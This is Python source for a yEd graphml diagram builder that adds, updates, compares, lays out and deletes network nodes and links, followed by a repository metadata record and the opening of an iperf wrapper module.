self.nodes_ids[id] = id
node.set("id", id)
# set id for groupnode graph:
node.find("./_default_ns_:graph", self.namespaces).attrib["id"] = "{}:".format(
id
)
# add labels
GroupNode = node.find(
"./_default_ns_:data/y:ProxyAutoBoundsNode/y:Realizers/y:GroupNode",
self.namespaces,
)
if label == "":
label = id
labels = {"c": label, "t": top_label, "b": bottom_label}
for position, label_text in labels.items():
if label_text.strip():
GroupNode.append(
self._create_label_element(
self.node_label_xml, label_text, modelPosition=position
)
)
# add description data
if description != "":
node.append(
self._create_data_element(
id=self.y_attr["node"]["description"], text=description
)
)
if url != "":
node.append(
self._create_data_element(id=self.y_attr["node"]["url"], text=url)
)
# save original id in node custom attribute:
node.append(
self._create_data_element(
id=self.y_attr["node"]["nmetadata"], text=json_dumps({"id": id}),
)
)
# set attributes for the node:
self.set_attributes(GroupNode, attributes)
self.graph_root.append(node)
def add_node(self, id, **kwargs):
"""
Convenience method to add node, by calling one of node add methods following
these rules:
* If ``pic`` attribute in kwargs, ``add_svg_node`` is called
* If ``group`` kwargs attribute is equal to `True`, ``_add_group_node`` is called
* ``add_shape_node`` is called otherwise
**Parameters**
* ``id`` (str) mandatory, unique node identifier, usually equal to node name
"""
kwargs["id"] = id
if kwargs.get("group", "").strip() == True:
self._add_group_node(**kwargs)
elif kwargs.get("pic", "").strip():
self.add_svg_node(**kwargs)
else:
self.add_shape_node(**kwargs)
def _link_exists(self, id, edge_tup):
"""method, used to check dublicate edges
"""
if id in self.edges_ids:
if self.link_duplicates == "log":
log.error(
"_link_exists: edge '{}' already added to graph".format(
",".join(edge_tup)
)
)
elif self.link_duplicates == "skip":
pass
return True
self.edges_ids.update({id: id})
def add_link(
self,
source,
target,
label="",
src_label="",
trgt_label="",
description="",
attributes={},
url="",
):
"""
Method to add link between nodes.
**Parameters**
* ``source`` (str) mandatory, id of source node
* ``target`` (str) mandatory, id of target node
* ``label`` (str) label at the center of the edge, by default equal to id attribute
* ``src_label`` (str) label to display at the source end of the edge
* ``trgt_label`` (str) label to display at target end of the edge
* ``description`` (str) string to save as link ``description`` attribute
* ``url`` (str) string to save as link ``url`` attribute
* ``attributes`` (dict) dictionary of yEd graphml tag names and attributes
Attributes dictionary keys will be used as xml tag names and values
dictionary will be used as xml tag attributes, example::
{
"LineStyle": {"color": "#00FF00", "width": "1.0"},
"EdgeLabel": {"textColor": "#00FF00"},
}
.. note:: If source or target nodes do not exist, they will be automatically
created
"""
# check type of source and target attribute
source_node_dict = source.copy() if isinstance(source, dict) else {"id": source}
source = source_node_dict.pop("id")
target_node_dict = target.copy() if isinstance(target, dict) else {"id": target}
target = target_node_dict.pop("id")
# check if target and source nodes exist, add it if not,
# self._node_exists method will update node
# if self.node_duplicates set to update, by default its set to skip
if not self._node_exists(source, **source_node_dict):
self.add_node(id=source, **source_node_dict)
source_id = self.nodes_ids[source]
if not self._node_exists(target, **target_node_dict):
self.add_node(id=target, **target_node_dict)
target_id = self.nodes_ids[target]
# create edge id
edge_tup = tuple(sorted([label, src_label, trgt_label, source, target]))
edge_id = hashlib.md5(",".join(edge_tup).encode()).hexdigest()
# check if edge already exists
if self._link_exists(edge_id, edge_tup):
return
# create edge element
edge = ET.fromstring(
self.edge_xml.format(
attrib_id=self.y_attr["edge"]["edgegraphics"],
id=edge_id,
source=source_id,
target=target_id,
)
)
# fill labels and description:
PolyLineEdge = edge.find("./_default_ns_:data/y:PolyLineEdge", self.namespaces)
labels = {"center": label, "source": src_label, "target": trgt_label}
for position, label_text in labels.items():
if label_text.strip():
PolyLineEdge.append(
self._create_label_element(
self.edge_label_xml,
label_text,
path="y:PreferredPlacementDescriptor",
placement=position,
)
)
if description != "":
edge.append(
self._create_data_element(
id=self.y_attr["edge"]["description"], text=description
)
)
if url != "":
edge.append(
self._create_data_element(id=self.y_attr["edge"]["url"], text=url)
)
# save source and target original nodes' id in edge emetadata attribute:
edge.append(
self._create_data_element(
id=self.y_attr["edge"]["emetadata"],
text=json_dumps({"sid": source, "tid": target, "id": edge_id}),
)
)
# fill in edge attributes:
self.set_attributes(PolyLineEdge, attributes)
# append edge element to graph:
self.graph_root.append(edge)
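# Worked example of the edge id used above (illustrative values):
#   edge_tup = tuple(sorted(["DF", "Gig0/0", "Gig0/1", "R1", "R2"]))
#   edge_id  = hashlib.md5(",".join(edge_tup).encode()).hexdigest()
# The id depends only on the two node ids and the three labels, so adding the
# same link twice is detected as a duplicate by _link_exists.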
def from_dict(self, data):
"""
Method to build graph from dictionary.
**Parameters**
* ``data`` (dict) dictionary with nodes and link/edges details.
Example ``data`` dictionary::
sample_graph = {
'nodes': [
{
'id': 'a',
'pic': 'router',
'label': 'R1'
},
{
'id': 'b',
'label': 'somelabel',
'bottom_label':'botlabel',
'top_label':'toplabel',
'description': 'some node description'
},
{
'id': 'e',
'label': 'E'
}
],
'edges': [
{
'source': 'a',
'src_label': 'Gig0/0',
'label': 'DF',
'target': 'b',
'trgt_label': 'Gig0/1',
'description': 'vlans_trunked: 1,2,3'
}
],
'links': [
{
'source': 'a',
'target': 'e'
}
]
}
**Dictionary Content Rules**
* dictionary may contain ``nodes`` key with a list of nodes dictionaries
* each node dictionary must contain unique ``id`` attribute, other attributes are optional
* dictionary may contain ``edges`` or ``links`` key with a list of edges dictionaries
* each link dictionary must contain ``source`` and ``target`` attributes, other attributes are optional
"""
[self.add_node(**node) for node in data.get("nodes", [])]
[self.add_link(**link) for link in data.get("links", [])]
[self.add_link(**edge) for edge in data.get("edges", [])]
def from_list(self, data):
"""
Method to build graph from list.
**Parameters**
* ``data`` (list) list of link dictionaries,
Example ``data`` list::
sample_graph = [
{
'source': 'a',
'src_label': 'Gig0/0\\nUP',
'label': 'DF',
'target': 'b',
'trgt_label': 'Gig0/1',
'description': 'vlans_trunked: 1,2,3\\nstate: up'
},
{
'source': 'a',
'target': {
'id': 'e',
'label': 'somelabel',
'bottom_label':'botlabel',
'top_label':'toplabel',
'description': 'some node description'
}
}
]
**List Content Rules**
* each list item must have ``target`` and ``source`` attributes defined
* ``target``/``source`` attributes can be either a string or a dictionary
* dictionary ``target``/``source`` node must contain ``id`` attribute and
other supported node attributes
.. note::
By default, the yed_diagram object's ``node_duplicates`` action is set to 'skip', meaning that a node will be added on its first
occurrence and ignored after that. Set ``node_duplicates`` to 'update' if a node with a given id needs to be updated by
later occurrences in the list.
"""
[self.add_link(**edge) for edge in data if edge]
def from_file(self, filename, file_load="xml"):
"""
Method to load data from file for processing. File format can
be yEd graphml (XML) or CSV
**Parameters**
* ``filename`` (str) OS path to file to load
* ``file_load`` (str) indicates the format of the file to load, supports ``xml``, ``csv``
"""
with open(filename, "r") as f:
if file_load.lower() == "xml":
self.from_xml(f.read())
elif file_load.lower() == "csv":
self.from_csv(f.read())
def from_xml(self, text_data):
"""
Method to load yEd graphml XML formatted text for processing
**Parameters**
* ``text_data`` (str) text data to load
"""
self.drawing = ET.fromstring(text_data)
# load graph details
self.graph_root = self.drawing.find("./_default_ns_:graph", self.namespaces)
self._load_yattrs()
# load all nodes IDs and build mapping between nmetadata ID and ID generated by yED
nmetadata_id = self.y_attr["node"].get("nmetadata")
for node in self.graph_root.iterfind("./_default_ns_:node", self.namespaces):
node_data = node.find(
"./_default_ns_:data[@key='{}']".format(nmetadata_id), self.namespaces
)
node_data = json_loads(node_data.text)
self.nodes_ids[node_data["id"]] = node.attrib["id"]
# add all edges IDs to self.edges_ids list
emetadata_id = self.y_attr["edge"].get("emetadata")
for edge in self.graph_root.iterfind("./_default_ns_:edge", self.namespaces):
edge_data = edge.find(
"./_default_ns_:data[@key='{}']".format(emetadata_id), self.namespaces
)
edge_data = json_loads(edge_data.text)
source = edge_data.get("sid")
target = edge_data.get("tid")
edge_id = edge_data.get("id")
if not edge_id:
# get labels from edge and form edge hash id
label, src_label, trgt_label = "", "", ""
for label_item in edge.iterfind(".//*/y:EdgeLabel", self.namespaces):
placement = label_item.attrib.get("preferredPlacement", "")
if "center" in placement:
label = label_item.text
elif "source" in placement:
src_label = label_item.text
elif "target" in placement:
trgt_label = label_item.text
# form edge hash
edge_tup = tuple(
sorted([source, target, label, src_label, trgt_label,])
)
edge_id = hashlib.md5(",".join(edge_tup).encode()).hexdigest()
self.edges_ids.update({edge_id: edge.attrib["id"]})
def from_csv(self, text_data):
"""
Method to build graph from CSV tables
**Parameters**
* ``text_data`` (str) CSV text with links or nodes details
This method supports loading CSV text data that contains nodes or links
information. If ``id`` in headers, ``from_dict`` method will be called for CSV
processing, ``from_list`` method will be used otherwise.
CSV data with nodes details should have headers matching add node methods
arguments and rules.
CSV data with links details should have headers matching ``add_link`` method
arguments and rules.
Sample CSV table with link details::
"source","src_label","label","target","trgt_label","description"
"a","Gig0/0","DF","b","Gig0/1","vlans_trunked: 1,2,3"
"b","Gig0/0","Copper","c","Gig0/2",
"b","Gig0/0","Copper","e","Gig0/2",
d,Gig0/21,FW,e,Gig0/23,
Sample CSV table with node details::
"id","pic","label","bottom_label","top_label","description"
a,router_1,"R1,2",,,
"b",,,"some","top_some",
"c",,"somelabel","botlabel","toplabel","some node description"
"d","firewall.svg","somelabel1",,,"some node description"
"e","router_2","R1",,,
"""
# import libs
from io import StringIO
import csv
# need to handle text data as file like object for csv reader to work
iostring = StringIO(newline="")
iostring.write(text_data)
iostring.seek(0)
# load csv data
dict_reader = csv.DictReader(iostring)
data_list = list(dict_reader)
# if id given - meaning it is nodes data
if data_list[0].get("id"):
self.from_dict({"nodes": data_list})
else:
self.from_list(data_list)
def dump_xml(self):
"""
Method to return current diagram XML text
"""
ret = ET.tostring(self.drawing, encoding="unicode")
ret = ret.replace("_default_ns_:", "").replace(":_default_ns_", "")
return ret
def dump_file(self, filename=None, folder="./Output/"):
"""
Method to save current diagram in .graphml file.
**Parameters**
* ``filename`` (str) name of the file to save diagram into
* ``folder`` (str) OS path to folder where to save diagram file
If no ``filename`` provided, timestamped format will be
used to produce filename, e.g.: ``Sun Jun 28 20-30-57 2020_output.graphml``
"""
import os
import time
# check output folder, if not exists, create it
if not os.path.exists(folder):
os.makedirs(folder)
# create file name
if not filename:
ctime = time.ctime().replace(":", "-")
filename = "{}_output.graphml".format(ctime)
# save file to disk
with open(folder + filename, "w") as outfile:
outfile.write(self.dump_xml())
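# Minimal usage sketch of the yed_diagram class (illustrative node and file names):
#   diagram = yed_diagram()
#   diagram.add_node("R1", top_label="core")
#   diagram.add_link("R1", "R2", label="10G", src_label="Eth1", trgt_label="Eth2")
#   diagram.dump_file(filename="topology.graphml", folder="./Output/")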
def set_attributes(
self,
element, # lxml object to update attributes for
attributes={}, # dictionary of attributes to update
):
"""
Method to set attributes for XML element
**Parameters**
* ``element`` (object) xml etree element object to set attributes for
* ``attributes`` (dict) dictionary of yEd graphml tag names and attributes
Attributes dictionary keys will be used as xml tag names and values
dictionary will be used as xml tag attributes, example::
{
"LineStyle": {"color": "#00FF00", "width": "1.0"},
"EdgeLabel": {"textColor": "#00FF00"},
}
"""
children = list(element)
for tag, attribs in attributes.items():
tag_exists = False
for child in children:
if tag in child.tag:
child.attrib.update(attribs)
tag_exists = True
if tag_exists == False: # create tag element:
tag_elem = ET.fromstring(
'<y:{} xmlns:y="http://www.yworks.com/xml/graphml"/>'.format(tag)
)
tag_elem.attrib.update(attribs)
element.append(tag_elem)
def update_node(
self,
id,
label=None,
top_label=None,
bottom_label=None,
attributes={},
description=None,
width="",
height="",
):
"""
Method to update node details
**Parameters**
* ``id`` (str) mandatory, unique node identifier, usually equal to node name
* ``label`` (str) label at the center of the shape node or above SVG node
* ``top_label`` (str) label displayed at the top of the node
* ``bottom_label`` (str) label displayed at the bottom of the node
* ``description`` (str) string to save as node ``description`` attribute
* ``width`` (int) node width in pixels
* ``height`` (int) node height in pixels
* ``attributes`` (dict) dictionary of yEd graphml tag names and attributes
Attributes dictionary keys will be used as xml tag names and values
dictionary will be used as xml tag attributes, example::
{
'Shape' : {'type': 'roundrectangle'},
'DropShadow': { 'color': '#B3A691', 'offsetX': '5', 'offsetY': '5'}
}
This method will replace existing and add new labels to the node.
Existing description attribute will be replaced with new value.
Height and width will override existing values.
Attributes will replace existing values.
"""
# get node element:
node = self.graph_root.find(
"./_default_ns_:node[@id='{}']".format(self.nodes_ids.get(id, id)),
self.namespaces,
)
if node is None:
log.error(
"update_node, cannot find node with id - {}".format(
self.nodes_ids.get(id, id)
)
)
return
labels = {"c": label, "n": label, "t": top_label, "b": bottom_label}
# try to find shapenode element
node_elem = node.find("./_default_ns_:data/y:ShapeNode", self.namespaces)
# try to find svgnode element
if node_elem is None:
node_elem = node.find("./_default_ns_:data/y:SVGNode", self.namespaces)
labels = {"n": label}
if node_elem is None:
log.error(
"Failed to find ShapeNode or SVGNode for node with id: '{}'".format(
self.nodes_ids.get(id, id)
)
)
return
# update attributes, update description if it does not exists
self.set_attributes(node_elem, attributes)
if description:
description_elem = node_elem.find(
".//y:data[@key='{}']".format(self.y_attr["node"]["description"]),
self.namespaces,
)
if not description_elem:
node_elem.append(
self._create_data_element(
id=self.y_attr["node"]["description"], text=description
)
)
else:
description_elem.text = description
# iterate over existing labels
for label_elem in node_elem.iterfind(".//y:NodeLabel", self.namespaces):
position = label_elem.attrib.get("modelPosition")
if not labels.get(position) is None:
label_elem.text = labels.pop(position)
# add new labels
for label_position, label in labels.items():
if label is None:
continue
node_elem.append(
self._create_label_element(
self.node_label_xml, label, modelPosition=label_position
)
)
# set width and height
node_geometry_element = node.find(".//*/y:Geometry", self.namespaces)
if width:
node_geometry_element.set("width", str(width))
if height:
node_geometry_element.set("height", str(height))
def update_link(
self,
edge_id="",
label="",
src_label="",
trgt_label="",
source="",
target="",
new_label=None,
new_src_label=None,
new_trgt_label=None,
description="",
attributes={},
):
"""
Method to update edge/link details.
**Parameters**
* ``edge_id`` (str) md5 hash edge id, if not provided, will be generated
based on edge attributes
* ``label`` (str) existing edge label
* ``src_label`` (str) existing edge src_label
* ``trgt_label`` (str) existing edge tgt_label
* ``source`` (str) existing edge source node ID
* ``target`` (str) existing edge target node id
* ``new_label`` (str) new edge label
* ``new_src_label`` (str) new edge src_label
* ``new_trgt_label`` (str) new edge tgt_label
* ``description`` (str) new edge description
* ``attributes`` (str) dictionary of attributes to apply to edge element
Either of these must be provided to find edge element to update:
* ``edge_id`` MD5 hash or
* ``label, src_label, trgt_label, source, target`` attributes to calculate ``edge_id``
``edge_id`` calculated based on - ``label, src_label, trgt_label, source, target`` -
attributes following this algorithm:
1. Edge tuple produced: ``tuple(sorted([label, src_label, trgt_label, source, target]))``
2. MD5 hash derived from tuple: ``hashlib.md5(",".join(edge_tup).encode()).hexdigest()``
This method will replace existing and add new labels to the link.
Existing description attribute will be replaced with new value.
Attributes will replace existing values.
"""
# make new labels equal to existing labels if new label not provided
new_label = new_label if new_label != None else label
new_src_label = new_src_label if new_src_label != None else src_label
new_trgt_label = new_trgt_label if new_trgt_label != None else trgt_label
# generate existing and new edge ID
edge_tup = tuple(sorted([label, src_label, trgt_label, source, target]))
new_edge_tup = tuple(
sorted([new_label, new_src_label, new_trgt_label, source, target])
)
edge_id = (
hashlib.md5(",".join(edge_tup).encode()).hexdigest()
if not edge_id
else edge_id
)
new_edge_id = (
hashlib.md5(",".join(new_edge_tup).encode()).hexdigest()
if not edge_id
else edge_id
)
if edge_id in self.edges_ids:
self.edges_ids.update({new_edge_id: self.edges_ids.pop(edge_id)})
elif edge_id:
self.edges_ids[edge_id] = edge_id
# find edge element
edge = self.graph_root.find(
'./_default_ns_:edge[@id="{}"]'.format(
self.edges_ids.get(edge_id, edge_id)
),
namespaces=self.namespaces,
)
        if edge is None:
            log.error(
                "update_link, cannot find edge with id - {}".format(
                    self.edges_ids.get(edge_id, edge_id)
                )
            )
            return
        PolyLineEdge = edge.find("./_default_ns_:data/y:PolyLineEdge", self.namespaces)
# update edge id
edge.attrib["id"] = self.edges_ids[new_edge_id]
# update description
if description:
description_elem = edge.find(
".//y:data[@key='{}']".format(self.y_attr["edge"]["description"]),
self.namespaces,
)
if description_elem is None:
edge.append(
self._create_data_element(
id=self.y_attr["edge"]["description"], text=description
)
)
else:
description_elem.text = description
# update labels
labels = {
"center": new_label,
"source": new_src_label,
"target": new_trgt_label,
}
# iterate over existing labels
for label_elem in PolyLineEdge.iterfind(".//y:EdgeLabel", self.namespaces):
label_placement_elem = label_elem.find(
".//y:PreferredPlacementDescriptor", self.namespaces
)
if not label_placement_elem is None:
position = label_placement_elem.get("placement")
if labels.get(position, "").strip():
label_elem.text = labels.pop(position)
# add new labels
for position, label_text in labels.items():
if not label_text.strip():
continue
PolyLineEdge.append(
self._create_label_element(
self.edge_label_xml,
label_text,
path="y:PreferredPlacementDescriptor",
placement=position,
)
)
# update attributes
self.set_attributes(PolyLineEdge, attributes)
def compare(
self,
data, # N2G dictionary data to compare against
missing_nodes={ # dict, attributes to apply to missing nodes
"BorderStyle": {"color": "#C0C0C0", "width": "2.0"},
"NodeLabel": {"textColor": "#C0C0C0"},
},
new_nodes={ # dict, attributes to apply to new nodes
"BorderStyle": {"color": "#00FF00", "width": "5.0"},
"NodeLabel": {"textColor": "#00FF00"},
},
missing_links={ # dict, attributes to apply to missing edges
"LineStyle": {"color": "#C0C0C0", "width": "1.0"},
"EdgeLabel": {"textColor": "#C0C0C0"},
},
new_links={ # dict, attributes to apply to new edges
"LineStyle": {"color": "#00FF00", "width": "1.0"},
"EdgeLabel": {"textColor": "#00FF00"},
},
):
"""
Method to combine two graphs - existing and new - and produce resulting
graph following these rules:
* nodes and links present in new graph but not in existing graph considered
as new and will be updated with ``new_nodes`` and ``new_links`` attributes by
default highlighting them in green
* nodes and links missing from new graph but present in existing graph considered
as missing and will be updated with ``missing_nodes`` and ``missing_links`` attributes
by default highlighting them in gray
* nodes and links present in both graphs will remain unchanged
**Parameters**
* ``data`` (dict) dictionary containing new graph data, dictionary format should be
the same as for ``from_dict`` method.
* ``missing_nodes`` (dict) dictionary with attributes to apply to missing nodes
* ``new_nodes`` (dict) dictionary with attributes to apply to new nodes
* ``missing_links`` (dict) dictionary with attributes to apply to missing links
* ``new_links`` (dict) dictionary with attributes to apply to new links
**Sample usage**::
from N2G import yed_diagram
diagram = yed_diagram()
new_graph = {
'nodes': [
{'id': 'a', 'pic': 'router_round', 'label': 'R1' }
],
'edges': [
{'source': 'f', 'src_label': 'Gig0/21', 'label': 'DF', 'target': 'b'}
]
}
diagram.from_file("./old_graph.graphml")
diagram.compare(new_graph)
diagram.dump_file(filename="compared_graph.graphml")
"""
if isinstance(data, dict):
# find new nodes
existing_nodes = []
new_nodes_list = []
for node in data["nodes"]:
node.setdefault("attributes", {})
if not node["id"] in self.nodes_ids:
node["attributes"].update(new_nodes)
self.add_node(**node)
new_nodes_list.append(node["id"])
else:
existing_nodes.append(node["id"])
# find missing nodes
for id in self.nodes_ids.keys():
if not id in existing_nodes and not id in new_nodes_list:
self.update_node(id=id, attributes=missing_nodes)
# find edges connected to missing nodes
for edge in self.graph_root.iterfind(
"./_default_ns_:edge[@source='{}']".format(id), self.namespaces
):
self.update_link(
edge_id=edge.get("id"), attributes=missing_links
)
for edge in self.graph_root.iterfind(
"./_default_ns_:edge[@source='{}']".format(
self.nodes_ids.get(id, "")
),
self.namespaces,
):
self.update_link(
edge_id=edge.get("id"), attributes=missing_links
)
for edge in self.graph_root.iterfind(
"./_default_ns_:edge[@target='{}']".format(id), self.namespaces
):
self.update_link(
edge_id=edge.get("id"), attributes=missing_links
)
for edge in self.graph_root.iterfind(
"./_default_ns_:edge[@target='{}']".format(
self.nodes_ids.get(id, "")
),
self.namespaces,
):
self.update_link(
edge_id=edge.get("id"), attributes=missing_links
)
# find new edges:
existing_edges = []
new_links_list = []
# combine all edges under "links" key
data.setdefault("links", [])
data["links"] += data.pop("edges") if data.get("edges") else []
for edge in data["links"]:
edge.setdefault("attributes", {})
# create edge id
edge_tup = tuple(
sorted(
[
edge["source"],
edge["target"],
edge.get("label", ""),
edge.get("src_label", ""),
edge.get("trgt_label", ""),
]
)
)
edge_id = hashlib.md5(",".join(edge_tup).encode()).hexdigest()
# add new edge
if not edge_id in self.edges_ids:
edge["attributes"].update(new_links)
self.add_link(**edge)
new_links_list.append(edge_id)
else:
existing_edges.append(edge_id)
# find missing edges:
for id in self.edges_ids.keys():
if not id in existing_edges and not id in new_links_list:
self.update_link(edge_id=id, attributes=missing_links)
def layout(self, algo="kk", width=1360, height=864, **kwargs):
"""
Method to calculate graph layout using Python
`igraph <https://igraph.org/python/doc/tutorial/tutorial.html#layout-algorithms>`_
library
**Parameters**
* ``algo`` (str) name of layout algorithm to use, default is 'kk'. Reference
`Layout algorithms` table below for valid algo names
* ``width`` (int) width in pixels to fit layout in
* ``height`` (int) height in pixels to fit layout in
* ``kwargs`` any additional kwargs to pass to igraph ``Graph.layout`` method
**Layout algorithms**
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
| algo name | description |
+=================================+================================================================================================================+
| circle, circular | Deterministic layout that places the vertices on a circle |
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
| drl | The Distributed Recursive Layout algorithm for large graphs |
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
| fr | Fruchterman-Reingold force-directed algorithm |
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
| fr3d, fr_3d | Fruchterman-Reingold force-directed algorithm in three dimensions |
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
| grid_fr | Fruchterman-Reingold force-directed algorithm with grid heuristics for large graphs |
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
| kk | Kamada-Kawai force-directed algorithm |
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
| kk3d, kk_3d | Kamada-Kawai force-directed algorithm in three dimensions |
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
| large, lgl, large_graph | The Large Graph Layout algorithm for large graphs |
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
| random | Places the vertices completely randomly |
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
| random_3d | Places the vertices completely randomly in 3D |
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
| rt, tree | Reingold-Tilford tree layout, useful for (almost) tree-like graphs |
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
| rt_circular, tree | Reingold-Tilford tree layout with a polar coordinate post-transformation, useful for (almost) tree-like graphs |
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
| sphere, spherical, circular_3d | Deterministic layout that places the vertices evenly on the surface of a sphere |
+---------------------------------+----------------------------------------------------------------------------------------------------------------+
"""
try:
from igraph import Graph as ig
except ImportError:
raise SystemExit(
"Failed to import igraph, install - pip install python-igraph"
)
igraph_graph = ig()
# iterate over diagrams and layout elements
nodes_iterator = self.graph_root.iterfind(
"./_default_ns_:node", self.namespaces
)
links_iterator = self.graph_root.iterfind(
"./_default_ns_:edge", self.namespaces
)
# populate igraph with nodes
for item in nodes_iterator:
igraph_graph.add_vertex(name=item.attrib["id"])
# populate igraph with edges
for item in links_iterator:
igraph_graph.add_edge(
source=item.attrib["source"], target=item.attrib["target"]
)
# calculate layout
layout = igraph_graph.layout(layout=algo, **kwargs)
# scale layout to diagram size
layout.fit_into(bbox=(width, height))
# add coordinates from layout to diagram nodes
for index, coord_item in enumerate(layout.coords):
x_coord, y_coord = coord_item
node_id = igraph_graph.vs[index].attributes()["name"]
node = self.graph_root.find(
"./_default_ns_:node[@id='{}']".format(node_id), self.namespaces
)
node_geometry_element = node.find(".//*/y:Geometry", self.namespaces)
node_geometry_element.set("x", str(round(x_coord)))
node_geometry_element.set("y", str(round(y_coord)))
def delete_node(self, id=None, ids=[]):
"""
Method to delete node by its id. Bulk delete operation
supported by providing list of node ids to delete.
**Parameters**
* ``id`` (str) id of single node to delete
* ``ids`` (list) list of node ids to delete
"""
ids = ids + [id] if id else ids
for node_id in ids:
node_id_to_pop = str(node_id)
# try to find using provided id
node = self.graph_root.find(
"./_default_ns_:node[@id='{}']".format(node_id), self.namespaces
)
if node is None:
# try to find using yed generated id
node_id = self.nodes_ids.get(node_id, "")
node = self.graph_root.find(
"./_default_ns_:node[@id='{}']".format(node_id), self.namespaces
)
if not node is None:
self.graph_root.remove(node)
self.nodes_ids.pop(node_id_to_pop)
# delete edges
for edge in self.graph_root.iterfind(
"./_default_ns_:edge[@source='{}']".format(node_id), self.namespaces
):
edge_id_to_pop = edge.get("id", "")
if not edge_id_to_pop in self.edges_ids:
edge_id_to_pop = None
# need to iterate over edges_ids values to find respective key to pop
for k, v in self.edges_ids.items():
if v == edge.get("id"):
edge_id_to_pop = k
break
if edge_id_to_pop:
self.edges_ids.pop(edge_id_to_pop)
self.graph_root.remove(edge)
for edge in self.graph_root.iterfind(
"./_default_ns_:edge[@target='{}']".format(node_id), self.namespaces
):
edge_id_to_pop = edge.get("id", "")
if not edge_id_to_pop in self.edges_ids:
edge_id_to_pop = None
# need to iterate over edges_ids values to find respective key to pop
for k, v in self.edges_ids.items():
if v == edge.get("id"):
edge_id_to_pop = k
break
if edge_id_to_pop:
self.edges_ids.pop(edge_id_to_pop)
self.graph_root.remove(edge)
def delete_link(
self,
id=None,
ids=[],
label="",
src_label="",
trgt_label="",
source="",
target="",
):
"""
Method to delete link by its id. Bulk delete operation
supported by providing list of link ids to delete.
If link ``id`` or ``ids`` not provided, id calculated based on - ``label, src_label,
trgt_label, source, target`` - attributes using this algorithm:
1. Edge tuple produced: ``tuple(sorted([label, src_label, trgt_label, source, target]))``
2. MD5 hash derived from tuple: ``hashlib.md5(",".join(edge_tup).encode()).hexdigest()``
**Parameters**
* ``id`` (str) id of single link to delete
* ``ids`` (list) list of link ids to delete
* ``label`` (str) link label to calculate id of single link to delete
* ``src_label`` (str) link source label to calculate id of single link to delete
* ``trgt_label`` (str) link target label to calculate id of single link to delete
* ``source`` (str) link source to calculate id of single link to delete
* ``target`` (str) link target to calculate id of single link to delete
"""
        if not id and not ids:
            # create edge id; build a new list so the mutable default argument is not modified
            edge_tup = tuple(sorted([source, target, label, src_label, trgt_label]))
            ids = [hashlib.md5(",".join(edge_tup).encode()).hexdigest()]
        else:
            ids = ids + [id] if id else ids
for edge_id in ids:
edge_id_to_pop = str(edge_id)
edge = self.graph_root.find(
"./_default_ns_:edge[@id='{}']".format(edge_id), self.namespaces
)
if edge is None:
# try to find using yed generated id
edge_id = self.edges_ids.get(edge_id, "")
edge = self.graph_root.find(
"./_default_ns_:edge[@id='{}']".format(edge_id), self.namespaces
)
if not edge is None:
self.graph_root.remove(edge)
# pop edge id from edges_ids dict
if not edge_id_to_pop in self.edges_ids:
edge_id_to_pop = None
# need to iterate over edges_ids values to find respective key to pop
for k, v in self.edges_ids.items():
if v == edge_id:
edge_id_to_pop = k
break
if edge_id_to_pop:
self.edges_ids.pop(edge_id_to_pop)
def _find_node(
self,
id=None,
label=None,
top_label=None,
bottom_label=None,
description=None,
url=None,
match_method="exact",
):
"""
NOT IMPLEMENTED
Method to take node attributes and return list of matched node IDs
"""
pass
def _find_link(
self,
edge_id=None,
label=None,
src_label=None,
trgt_label=None,
source=None,
target=None,
description=None,
match_method="exact",
):
"""
NOT IMPLEMENTED
Method to take node attributes and return list of matched node IDs
"""
pass
``` |
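The `update_link` and `delete_link` docstrings above both describe how a link id is derived when none is supplied: the five edge attributes are sorted into a tuple and hashed with MD5. A minimal sketch of that derivation (the attribute values below are illustrative only, not from the repo):
```python
import hashlib

# hypothetical edge attributes
label, src_label, trgt_label, source, target = "DF", "Gig0/21", "", "R1", "R2"

# 1. produce the sorted edge tuple
edge_tup = tuple(sorted([label, src_label, trgt_label, source, target]))

# 2. derive the MD5 hash used as the edge id
edge_id = hashlib.md5(",".join(edge_tup).encode()).hexdigest()

# this value can then be passed as update_link(edge_id=...) or delete_link(id=...)
print(edge_id)
```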
{
"source": "jinjamator/pyperf2",
"score": 2
} |
#### File: pyperf2/pyperf2/__init__.py
```python
import queue
import subprocess
import threading
import signal
import time
import json
import re
import os
import pyjq
import copy
from decimal import Decimal
from pprint import pprint, pformat
import logging
import datetime
def output_reader(proc, outq, parent):
for line in iter(proc.stdout.readline, b""):
outq.put(line.decode("utf-8"))
# print("{0} {1}".format(parent.name,line.decode('utf-8')))
parent.line_ready_callback()
class IPerfInstance(object):
def __init__(self):
self.type = None
self.report_interval = "1"
self.protocol = "tcp"
self.iperf_binary_path = "/usr/bin/iperf"
self._outq = queue.Queue()
self._proc = None
self.server_ip = None
self.bind_ip = None
self.name = None
self._running = False
self.realtime = True
self.bandwidth = "1000pps"
self.port = "5001"
self.status = "configured"
self._result_regex = None
self._info_regex = None
self._results = {}
self.test_duration = "86400"
self.client_source_port = None
self.use_linux_namespace = None
self._on_data_callbacks = []
self._on_packetloss_callbacks = []
self.currently_has_loss = {}
self._output_reader_thread = None
self._cleanup_timer_thread = None
self._raw_log_filepath = None
self._raw_log_filehandler = None
self._creation_time = datetime.datetime.now().replace(microsecond=0).isoformat()
if "pps" in self.bandwidth:
self.expected_interval_packets = int(
Decimal(self.report_interval) * Decimal(self.bandwidth[:-3])
)
else:
self.expected_interval_packets = None
self._log = logging.getLogger("")
self._current_event_number = 0
def __del__(self):
try:
self._raw_log_filehandler.close()
except:
pass
def set_raw_log_path(self, path):
self._raw_log_filepath = "{0}{1}{3}_{2}_instance_raw.log".format(
path, os.path.sep, self.name, self._creation_time
)
self._raw_log_filehandler = open(self._raw_log_filepath, "w")
def line_ready_callback(self):
info_data = None
report_data = None
line = self._outq.get(block=True)
stream_id = None
interval_begin = None
interval_end = None
last_interval_begin = None
is_receiver = False
is_sender = False
packets_lost = None
packets_received = None
packet_loss_event_message = False
report_message = False
timestamp = datetime.datetime.now().isoformat()
if self._raw_log_filehandler:
self._raw_log_filehandler.write(line)
self._raw_log_filehandler.flush()
